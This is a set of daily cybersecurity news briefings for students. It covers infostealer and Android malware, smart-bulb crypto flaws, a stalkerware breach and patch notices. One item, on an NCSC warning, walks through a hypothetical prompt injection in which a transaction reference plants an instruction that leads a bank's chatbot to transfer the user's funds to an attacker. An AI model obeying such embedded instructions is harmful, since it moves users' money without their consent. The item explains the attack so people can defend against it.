Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Open Source Stealer Catches On Quickly

Black hats everywhere got a very nice present last Christmas with the publication on GitHub of the code for a versatile infostealer called SapphireStealer. It didn't take long for a variety of threat actors to latch on to this gift, downloading it and tinkering with the code to add functionality as well as to add detection-evasion features. By mid-January 2023, modified binaries were being uploaded to public malware repositories, and by now multiple threat actors have adopted SapphireStealer, continuing to adapt and improve its capabilities.

Now, researchers at Cisco Talos have provided an analysis of this increasingly popular black hat tool. Sapphire Stealer was written for the .NET platform and initially offered some basic functionality, such as capturing host information (IP address, hostname, OS and CPU architecture, etc.), screenshots, cached browser credentials and exfiltrating a variety of filetypes under the user's Desktop folder. It specifically targets Chromium-based browsers, killing their processes and then searching for their credential databases before taking a screenshot and creating a zipfile of this data, plus any files it finds.

The data is actually exfiltrated by using the SMTP protocol to send it via mail.ru, using embedded credentials - after all, if you can compile the source code, this eliminates any need for separate configuration files. However, later samples created by other threat actors use a variety of exfiltration methods including a Discord webhook API and Telegram channels, and also target a variety of additional filetypes. The code has also been refactored to make it more efficient.

However, the use of hardcoded SMTP credentials can leak information about the threat actors themselves - the Cisco Talos researchers were able to identify one hacker who rather sloppily seems to have used a personal email account which, matched with other clues in the source, led to his identification as a Russian freelance web developer. Tsk, tsk.

Brumaghin, Edmund, SapphireStealer: Open-source information stealer enables credential and data theft, blog post, 31 August 2023. Available online at https://blog.talosintelligence.com/sapphirestealer-goes-open-source/.

Light Bulbs Leak Credentials

While many smart home devices connect via the Zigbee low-bandwidth mesh network protocol, this involves the use of a gateway between the owner's wifi network and the Zigbee network - an additional expense which some manufacturers try to undercut by putting their devices directly on the 802.11 wi-fi network. This cuts costs, but it means that an attacker can use conventional tools and techniques to attack such devices and then potentially pivot, using them to attack more valuable targets on the wifi network. And this is a real problem because IoT devices are notorious for having vulnerabilities in their firmware, making them an ideal pivot point for attackers.

A classic example comes by courtesy of three researchers at the University of Catania in Italy and Royal Holloway, University of London. In a paper published in the Proceedings of the 20th International Conference on Security and Cryptography, they pretty much demolished the security of the Tp-Link Tapo Smart Wi-Fi Light Bulb, Multicolor (L530E), discovering four very basic vulnerabilities (the kind that would get my cryptography students a sharp comment in assignment feedback).

Like many such devices, the light bulb must first be joined to the user's wi-fi network. On first being powered up, the bulb operates as an access point with its own SSID of Tapo Bulb XXXX, and the user then connects their smartphone to this AP, using the Tapo app to provide the real network SSID and passphrase/key. The problem is that this transaction is almost completely unauthenticated, allowing an attacker to masquerade as a lightbulb and capture the owner's network credentials. This vulnerability garners a CVSS score of 8.8, i.e. high severity.

Such authentication as there is, is based on a keyed hash, which uses a hard-coded 32-bit key - and by capturing just one genuine message exchanged by a bulb with the Tapo app, this can be extracted via a brute-force offline attack in just over a couple of hours. (CVSS score: 7.6, high severity).

The third vulnerability is a classic of its type: the use of AES-238-CBC, i.e. cipher block chaining mode, with the same initialization vector for every message (CVSS score: 4.6, medium severity). And to complete the picture, the protocol is vulnerable to replay attacks, since there is no use of message ID's, timestamps or nonces to ensure message freshness (CVSS score: 5.7, medium severity).

The researchers responsibly disclosed these vulnerabilities to Tp-Link, of course, and the company is working on updated firmware for the bulbs. Meanwhile, the work experience kid or summer intern who wrote the code has presumably signed up for a cryptography class next semester.

But all this serves as a reminder: IoT devices and the vulnerabilities they bring with them can pose a severe risk to other devices on the same network. Placing devices like light bulbs and locks on a Zigbee network behind a gateway adds an extra level of security as well as additional benefits like increased range for external lights.

Binaventura, Davide, Sergio Esposito and Giampaolo Bella, Smart Bulbs can be Hacked to Hack into your Household, Proc 20th Intl. Conf. on Security and Cryptography, pp, 218-229. Available online at https://arxiv.org/abs/2308.09019.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

NCSC Warns of AI Chatbot Prompt Injection Attacks

AI chatbots, which use generative transformers to extract information from pre-trained large language models (LLM's), are very sensitive to the format of the prompts which are used to qury them. Increasingly, however, such chatbots are being integrated into a variety of products and services - some for internal use within organizations, and some for use by customers. And because some of the behaviours exhibited by these chatbots are unpredictable - think of 'AI hallucinations' which have caused LLM's to reference non-existent research papers or cite non-existent law cases - they are ripe for exploitation by creative hackers willing to experiment with prompts.

One problem is that LLM's are unable to distinguish between an instruction and data provided to help complete the instruction. This could, hypothetically, be exploited by an attacker who constructs an invoice or transaction request, with the transaction reference hiding a prompt injection on the LLM underlying the recipient's bank's AI chatbot. Later, when the recipient asks the chatbot, "Am I spending more this month?", the LLM analyses this month's transactions, encounters the malicious transaction and transforms this into a request to transfer funds to the attacker's account. Although this example is hypothetical, similar attempted attacks have been seen in the wild.

Over the years, we have developed a good understanding of SQL Injection, command injection and other injection attacks. But since LLM-based chatbots are intended to interact using natural human language, simple syntax-based input sanitzation techniques are unlikely to work without rendering the chatbot near-useless. We need to dig deeper into the semantic processing performed by transformers in order to make chatbots resistant to prompt injection; the problem is not dissimilar to making human users resistant to social engineering.

C, Dave, Exercise caution when building off LLMs, blog post, 30 August 2023. Available online at https://www.ncsc.gov.uk/blog-post/exercise-caution-building-off-llms.

NCSCand Partners Analyze Infamous Chisel Malware

In other news from the NCSC, it - along with a number of five eyes partners - has released a malware analysis report on the Infamous Chisel mobile device malware. Infamous Chisel, which targets Android devices is associated with the Sandworm threat actor group, which is linked to the Main Centre for Special Technologies (GTsST) within the GRU, Russia's military intelligence service.

In essence, Infamous Chisel is a collection of components which enable persistent access to an infected device via a backdoor over the Tor onion routing network or via SSH, while periodically collecting and exfiltrating victim information, such as device configuration, and files, either of commercial interest or from applications which are specific to the Ukrainian military. It can also scan the local network, gathering information about active hosts, open ports and banner messages.

The 35-page report provides a detailed analysis of the various components and IOC's, which are also available in STIX JSON and XML formats via CISA:

• AR23-243A STIX in JSON format: https://www.cisa.gov/sites/default/files/2023-08/AR23-243A%20Infamous%20Chisel%20Malware%20Analysis%20Report.stix_.json
• AR23-243A STIX in XML format: https://www.cisa.gov/sites/default/files/2023-08/AR23-243A.stix_.xml

NCSC, Infamous Chisel: Malware Analysis Report, report, 31 August 2023. Available online at https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/infamous-chisel/NCSC-MAR-Infamous-Chisel.pdf.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Another 'Good Hacking' Case Reported

In the cybersecurity world, we view risk as being all downside - but risk professionals will tell you that the inherent uncertainties sometimes work in your favour and produce favourable outcomes. The speculative risk in investments provide a good example: occasionally, a stock takes off for some reason, and you make a windfall. There aren't many such cases in our field, but it sometimes happens - for example, I've received vulnerability reports from unknown white - or, possibly grey - hats, tipping me off before a black hat discovered them.

Now, echoing yesterday's report of the FBI's stealthy distribution of a tool to disable the Qakbot malware, comes news of another hack-the-hackers exploit.

For some years, a piece of Portuguese-language phone spyware called WebDetetive has been implanted on the phones of victims in South America, generally manually, by someone known to the victim, and who knows the phone's passcode. Once installed, the spyware disguises itself by changing its icon, and then sets about uploading messages, call logs, phone call recordings, photos, ambient microphone recordings and precise location data to the WebDetetive servers. Whoever installed the spyware can now surveil the victim - which is why this type of spyware is often referred to as 'stalkerware'.

However, unnamed hackers recently identified several vulnerabilities which allowed them to compromise WebDetetive's servers and access its user database. Further exploiting the product's dashboard, which the stalkers use to surveil their victims, the hackers were able to download every dashboard record, including every customer's email address.

Using the dashboard, the hackers were also able to delete victim devices from the spyware network, preventing them from uploading further data. "Which we definitely did. Because we could. Because #fuckstalkerware", wrote the hackers in an undated note included among 1.5 GB of data scraped from the spyware's dashboard. This data included information about each customer - the IP address they had logged in from, their purchase history and also details of every device that customer had compromised, including the spyware version number and the types of data being collected. Importantly, the data did not include any data stolen from the victims' phones.

The data was indexed by DDoSecrets (https://ddosecrets.com/wiki/Distributed_Denial_of_Secrets), who shared it with TechCrunch for analysis, revealing that 74,336 unique customer email addresses had used the spyware to compromise 76,794 victim phones.

The breach puts WebDetetive's management in a tough spot. Will they notify their customers of the breach, assuming they still have records to do so? Email enquiries sent by TechCrunch got no response. But a lot of phone users, particularly victims of domestic violence and abuse, can breath a little easier.

Whittaker, Zack, A Brazilian phone spyware was hacked and victims’ devices ‘deleted’ from server, TechCrunch, 27 August 2023. Available online at https://techcrunch.com/2023/08/26/brazil-webdetetive-spyware-deleted/.

Qakbot Advisory

Speaking of Qakbot, as we were just yesterday, CISA and the FBI have released a joint Cybersecurity Advisory to disseminate the IOC's discovered and used in the FBI takedown, along with recommendations for mitigation. There's quite a lot of useful detail in the 9-page advisory, including an overview of the botnet's three-tier C2 infrastructure and a mapping to the MITRE ATT&CK framework.

CISA, Identification and Disruption of QakBot Infrastructure, cybersecurity advisory, 30 August 2023. Available online at https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-242a.

Mozilla Security Updates

The Mozilla Foundation has released security updates to address vulnerabilities in:

• Firefox 117 (https://www.mozilla.org/en-US/security/advisories/mfsa2023-34/)
• Firefox ESR 115.2 (https://www.mozilla.org/en-US/security/advisories/mfsa2023-36/), and
• Firefox ESR 102.15 (https://www.mozilla.org/en-US/security/advisories/mfsa2023-35/)

You know what to do - end users, choose Help -> About Firefox in the menu and let the update download, while admins who redistribute the browsers in their organizations should get ready to roll out the new versions.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.